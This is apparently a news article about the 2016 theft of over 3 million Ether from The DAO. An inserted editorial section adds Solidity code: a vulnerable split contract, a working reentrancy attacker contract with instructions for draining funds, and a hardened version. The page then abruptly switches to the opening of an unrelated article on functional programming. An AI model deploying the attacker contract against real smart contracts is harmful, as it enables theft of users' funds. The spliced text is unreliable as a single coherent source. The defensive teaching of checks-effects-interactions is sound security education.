DAO May Be Dead After $60 Million Theft

A serious blow to those who believe the blockchain is the future of commerce

Illustration: Getty Images

In the world of cryptocurrency, seven-figure heists are a rite of passage. And today Ethereum, a much-hyped blockchain currency and autonomous software platform, has come of age. This morning, participants in a lavishly funded investment vehicle called The DAO woke up to an onslaught of alarm bells when it was discovered that an attacker had exploited a vulnerability in the fund's code to drain it.

At 4 a.m., Griff Green, a developer for Slock.it, a company based in Germany that is building on the Ethereum blockchain and created The DAO, sent out this alert on the community’s Slack channel:

“The DAO is being attacked. It has been going on for 3-4 hours, it is draining ETH at a rapid rate. This is not a drill.”

By midday, the attacker had stolen over 3 million Ether (Ethereum’s native currency), which at the time was worth more than 60 million U.S. dollars.

The DAO is a public investment fund that exists as a bundle of software (a set of smart contracts) on the Ethereum network. In a sale this spring, participants signed up for the fund by using their Ether to buy DAO tokens, which gave them proportional ownership as well as the right to vote on investment proposals. The DAO software was intended to autonomously coordinate and enforce voting and fund allocation, creating an investment vehicle that could operate without third parties. The sale was far more successful than anyone expected: by the end of May, Ether holders had put more than $150 million worth of their cryptocurrency into The DAO.

A day before the fund opened for business, a group of researchers identified critical flaws and biases in the process whereby participants vote on spending proposals. There was an appeal for a moratorium until fixes could be made, but today’s losses were caused by a bug that had gone unnoticed until now.

The DAO software gives token holders the ability to take their contributions and split from the larger group into their own identical DAOs. Once the split occurs, the person who created the new DAO has full control over what happens to its funds, and after 27 days he or she is free to withdraw them and recoup the investment. People who choose this route should be able to leave with only as much as they rightfully own. But late last night, someone found a way to split off with more than their fair share. According to sources, the attacker now controls a split-off (“child”) DAO that contains 100 times the amount he initially invested.
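
The article does not name the flaw. Its cause, established in later analyses and stated here as an editorial addition rather than taken from the page, was a recursive-call (reentrancy) bug: the split routine sent a member's Ether out through an external call before recording that the member had been paid, so a contract receiving that payment could call the split routine again while its balance was still credited, collecting the same amount over and over until gas or the fund ran out. The contracts below are an added illustration in modern Solidity, written for this page and not taken from The DAO's code; the names VulnerableSplit, Reentrant and HardenedSplit and the simplified one-balance-per-member model are assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added illustration for this page; not The DAO's code. The contract names,
// the single-balance "split" model and the attack parameters are assumptions.

interface ISplit {
    function deposit() external payable;
    function splitOut() external;
}

// A member asks to "split": the contract pays out the member's whole balance.
// Bug: the Ether is sent (handing control to the recipient) BEFORE the
// balance is zeroed, so a contract recipient can re-enter splitOut() while
// its balance is still credited.
contract VulnerableSplit is ISplit {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function splitOut() external {
        uint256 owed = balances[msg.sender];
        require(owed > 0, "nothing to split");
        (bool ok, ) = msg.sender.call{value: owed}(""); // interaction first ...
        require(ok, "payment failed");
        balances[msg.sender] = 0;                       // ... effect recorded last
    }
}

// Attacker: deposits a small stake, starts one legitimate split, and from its
// receive() hook calls splitOut() again for each round while the target still
// has Ether to pay. Every round pays out the same "owed" amount again.
contract Reentrant {
    ISplit public immutable target;
    address public immutable owner;
    uint256 public rounds;

    constructor(address t) {
        target = ISplit(t);
        owner = msg.sender;
    }

    function attack(uint256 extraRounds) external payable {
        require(msg.sender == owner, "not owner");
        rounds = extraRounds;
        target.deposit{value: msg.value}(); // the attacker's fair share
        target.splitOut();                  // first, legitimate withdrawal
    }

    receive() external payable {
        // Re-enter while the target can still cover another payout.
        if (rounds > 0 && address(target).balance >= msg.value) {
            rounds -= 1;
            target.splitOut();
        }
    }

    function collect() external {
        require(msg.sender == owner, "not owner");
        payable(owner).transfer(address(this).balance);
    }
}

// Hardened form: checks, then effects, then interactions; plus a guard that
// refuses nested entry so a malicious recipient cannot call back in at all.
contract HardenedSplit is ISplit {
    mapping(address => uint256) public balances;
    bool private entered;

    modifier nonReentrant() {
        require(!entered, "reentrant call");
        entered = true;
        _;
        entered = false;
    }

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function splitOut() external nonReentrant {
        uint256 owed = balances[msg.sender];
        require(owed > 0, "nothing to split");
        balances[msg.sender] = 0;                       // effect first
        (bool ok, ) = msg.sender.call{value: owed}(""); // interaction last
        require(ok, "payment failed");
    }
}
```

Deploy VulnerableSplit, let other members deposit into it, then deploy Reentrant pointed at it and call attack with a small deposit and a few rounds: the attacker walks away with its deposit multiplied by rounds plus one, limited only by the contract's balance and the gas available for the nested calls. Point the same Reentrant at HardenedSplit and the first nested splitOut reverts on the guard (and would revert on the already-zeroed balance even without it), which makes the outer payment fail and the whole split revert, so the attacker ends with exactly what it put in. Note that the vulnerable contract zeroes the balance with an assignment rather than a subtraction; a subtraction would have underflowed and reverted under 0.8's checked arithmetic, which is why the pattern shown here matches the 2016 behaviour.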

Already, Ethereum developers are proposing ways to fix the situation. The easiest, and least controversial solution is for the network to adopt a new version of the Ethereum software that blacklists the address holding the hacker’s stolen funds, making it impossible for him to cash out on the heist.

But this would do nothing to recoup the losses sustained by The DAO. To return the funds to their rightful owners, the Ethereum community would have to agree to a far more radical maneuver called a “hard fork”: a new version of the software, adopted by a majority of the network, whose rules rewrite the ledger to undo the heist, in effect returning the record to the state it was in before the theft occurred. This option will inevitably inspire heated debate, because it calls into question the immutability of the Ethereum blockchain, which is one of the defining characteristics of the technology.

There is no telling yet whether The DAO will survive this hack. But the theft has undeniably harmed the reputation of decentralized financial instruments and of the Ethereum project in general. Since Ethereum went live in the summer of 2015, developers have rushed to build autonomously functioning services on the platform. It is now becoming apparent that properly implementing these applications requires expertise in both coding and game theory.

When contracts are not properly vetted, we now know that it is not only the people using that particular application who suffer; the platform as a whole takes a hit. In the hours following the heist, the price of Ether dropped by more than 30 percent on online exchanges.

Why Functional Programming Should Be the Future of Software Development

It’s hard to learn, but your code will produce fewer nasty surprises

Illustration: Shira Inbar

You’d expect the longest and most costly phase in the lifecycle of a software product to be the initial development of the system, when all those great features are first imagined and then created. In fact, the hardest part comes later, during the maintenance phase. That’s when programmers pay the price for the shortcuts they took during development.

So why did they take shortcuts? Maybe they didn’t realize they were cutting any corners; only when their code was deployed and exercised by a lot of users did its hidden flaws come to light. And maybe the developers were rushed: time-to-market pressures all but guarantee that software will contain more bugs than it otherwise would.
